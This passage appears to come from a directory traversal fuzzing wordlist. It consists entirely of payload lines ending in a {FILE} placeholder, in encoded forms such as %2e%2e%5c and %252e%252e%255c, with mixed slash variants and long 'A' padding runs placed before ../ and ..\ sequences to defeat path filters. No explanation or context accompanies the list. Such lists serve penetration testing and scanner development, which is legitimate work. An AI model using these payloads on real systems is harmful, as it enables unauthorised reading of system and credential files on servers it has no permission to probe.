%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
/..\{FILE}&lt;br /&gt;
/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA